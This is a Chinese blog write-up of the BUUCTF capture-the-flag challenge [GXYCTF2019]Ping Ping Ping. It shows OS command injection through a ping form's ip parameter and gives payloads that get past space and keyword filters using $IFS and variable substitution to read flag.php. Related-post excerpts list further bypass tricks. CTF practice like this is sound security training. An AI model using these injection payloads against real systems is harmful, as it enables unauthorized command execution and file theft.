[GXYCTF2019]Ping Ping Ping 1

已于 2022-07-24 17:24:02 修改
阅读量2.3k 收藏 7
点赞数 2
文章标签: web
于 2022-07-01 21:13:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43618536/article/details/125563600
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[GXYCTF2019]Ping Ping Ping 1

题目

BUUCTF的[GXYCTF2019]Ping Ping Ping
在这里插入图片描述

一、做题步骤

1.尝试ping 127.0.0.1

?ip=127.0.0.1
在这里插入图片描述

2.尝试查看当前目录下的文件

?ip=127.0.0.1;ls
在这里插入图片描述

3.查看flag.php

1./?ip=127.0.0.1;cat flag.php
提示空格被过滤
在这里插入图片描述

2./?ip=127.0.0.1;cat;flag.php
提示flag被过滤
在这里插入图片描述
3.利用参数替代的方法
?ip=127.0.0.1;b=g;cat$IFS$fla$b.php
查看源代码,得到flag{3b2bf241-e1a1-44ca-a61c-3dda74f04922}
在这里插入图片描述

?ip=127.0.0.1;b=g;tac$IFS$2fla $b.php
flag直接显示在页面上,无需查看代码
tac函数是cat函数的反写
在这里插入图片描述

林本
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[GXYCTF2019]Ping Ping Ping1
weixin_61021815的博客
05-14 1601
进入页面没有什么东西,尝试填一下ip 可以 使用多命令执行符 ; 无论逻辑 && 命令1正确则命令2执行,命令1错误则命令2不执行 || 命令1错误命令2执行,命令2错误则命令1执行 构造?ip=127.0.0.1 ;ls 构造?ip=127.0.0.1;cat flag.php 发现存在过滤 空格 想办法绕过一下 1.${IFS} 2.$IFS$1 3.${IFS 4.%20 5.<和<>重定向符替换 6.%09替换 注:...
Linux批量pingIP地址
最新发布
05-17
在Linux系统中,通过shell脚本读取IP列表,进行批量ping操作,并记录结果
BUUCTF—[GXYCTF2019]Ping Ping Ping1
qq_57778984的博客
10-22 332
内联绕过就是将反引号内命令的输出结果作为另一个命令的输入来执行,比如系统对flag字符进行了过滤,但是单独使用ls命令时又会回显出index.php和flag.php文件,那么我们可以通过ls命令将index.php和flag.php作为输入,通过cat查看两个文件获取flag,而不用输入cat flag.php触发关键词。3.尝试在执行ping命令后执行其他命令,用";连接两个命令时,第二个命令只有在第一个命令执行成功的情况下才会执行。连接两个命令时,第二个命令只有在第一个命令执行失败的情况下才会执行。
[GXYCTF 2019]Ping Ping Ping
2301_80358831的博客
04-26 306
命令执行的绕过姿势,本题主要还是使用空格绕过的方法进行解题
[GXYCTF2019]Ping Ping Ping
pakho_C的博客
02-01 1405
[GXYCTF2019]Ping Ping Ping 打开靶场 就只有一个提示,直接按照提示进行测试 会返回ping ip的结果,联想到另外一道题,里面介绍了管道符的使用 [ACTF2020 新生赛]Exec 尝试直接使用管道符 使用ls查看目录下的文件,尝试访问flag.php 根据提示,应该是空格被过滤了,需要绕过空格 命令执行漏洞利用及绕过方式总结 常用的绕过方式: ${IFS} $IFS$1 < <> {cat,flag.php} //用逗号实现空格功能 %09
BUUCTF[GXYCTF2019]Ping Ping Ping
2301_78136321的博客
09-26 592
cat$IFS$1fla$a.php,发现页面没有变化,也没有被过滤。五,因为flag被过滤,需要寻找绕过方法,需要查看源代码,检查绕过规则.输入/?七,查看网络源代码,可发现flag为flag{71fc3286-23fd-4032-a67b-ee9ff4b9a06d}三,利用Linux命令cat flag.php命令进行文件查看.发现空格被过滤,进行绕过。四,全部进行实验可以发现只有$IFS$1可以绕过但同时也发现flag也被过滤。一,打开题目,发现可以进行ping操作,在/?
LabVIEW实现网络Ping IP测试
07-10
1. **ICMP协议**:Ping命令基于Internet Control Message Protocol(ICMP)协议,用于网络设备间的错误检测和简单通信。 2. **Echo请求与响应**:在ping测试中,发送端发送一个Echo请求报文到目标IP,接收端接收到...
Ping命令实现的扩充
09-27
实验内容:Ping命令实现的扩充,在给定的Ping程序的基础上做如下功能扩充: ? -h 显示帮助信息 ? -b 允许ping一个广播地址,只用于IPv4 ? -t 设置ttl值,只用于IPv4 ? -q 安静模式。不显示每个收到的包的分析结果,...
Labview ping IP.vi
01-07
通过程序来ping设备的IP地址,这样就可以确认当前设备是否已经正确连接到电脑。在连接设备之前可以判断
ping工具.zip
03-19
1. **发送时间**:记录每次ping请求发出的具体时间,便于分析网络波动与特定事件的时间关系。 2. **响应时间**:显示从发送请求到接收到回应所需的时间,这是衡量网络延迟的关键指标。 3. **状态信息**:可能包括...
BUUCTF [GXYCTF2019]Ping Ping Ping
m0_49025459的博客
04-30 688
题目 打开网站 就这么点东西,啥都没有,那么我们浅试一下 那我们ls一下将文件名都输出出来,我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句,例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错,才执行后面的语句,所以前面的语句必须为假,例如 ping 1||whoami &前面的...
[GXYCTF2019]Ping Ping Ping 【多解】
PromisingQ
07-31 674
[GXYCTF2019]Ping Ping Ping 进入靶场环境:     加上题目是ping ping ping  所以可以猜测是需要我们命令执行读取flag 加上?ip=127.0.0.1 http://3d59e365-7e67-4e43-b2f5-dec887255281.node3.buuoj.cn/?ip=127.0.0.1    可以看到页面成功返回,我们尝试使用管道符执行我们想要执行的命令 ?ip=127.0.0.1 | ls 这个时候
BUUCTF Web [GXYCTF2019]Ping Ping Ping
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [GXYCTF2019]Ping Ping Ping一、题目简介二、思路分析1)多命令执行2)绕过空格3)绕过flag三、解题步骤1)查看当前目录2)查看文件内容3)flag 在注释中四、总结 一、题目简介 进入连接后是一个「ping」的功能,参数 ip 传递的内容会被当做 ip.
BUUCTF WEB [GXYCTF2019]Ping Ping Ping1
guishengyx的博客
10-19 176
直接试试传参ip 他确实去ping了 昨天也碰到过一个差不多的题目 所以试一下linux的指令 ?ip=192.168.1.1;ls 成功了 果然是linux 尝试打开flag.php 看提示应该是过滤了空格 上百度找到了几种代替空格的方法 %20(space)、%09(tab)、$IFS$9、${IFS}$9、 {IFS}、IFS 测试发现括号也被过滤了 所以使用$IFS$9代替空格 继续打开flag.php 还是失败了 试试打开index.php c...
BUUCTF__[GXYCTF2019]Ping Ping Ping_题解
风过江南乱的博客
06-25 3060
前言 我感觉我是一个假的理科生,假的计算机相关专业学生,完全没有该有的样子 这题有点东西,不算太水。只是对我来说。 读题 题目是Ping,打开也没有内容,就一个get传参的ip变量 不过看到ip和ping就容易联想到,终端ping命令。 先尝试传入一个ip=127.0.0.1,于是乎出现了如下,在终端下执行的效果就是这样,命令执行石锤了。 命令执行可以干很多事,也就是命令行,LInux下大佬们日常操作都用命令行代替鼠标。 首先想到用什么办法?让它执行我们需要的命令。很明显变量ip是突破点。 先看传
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 9913
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值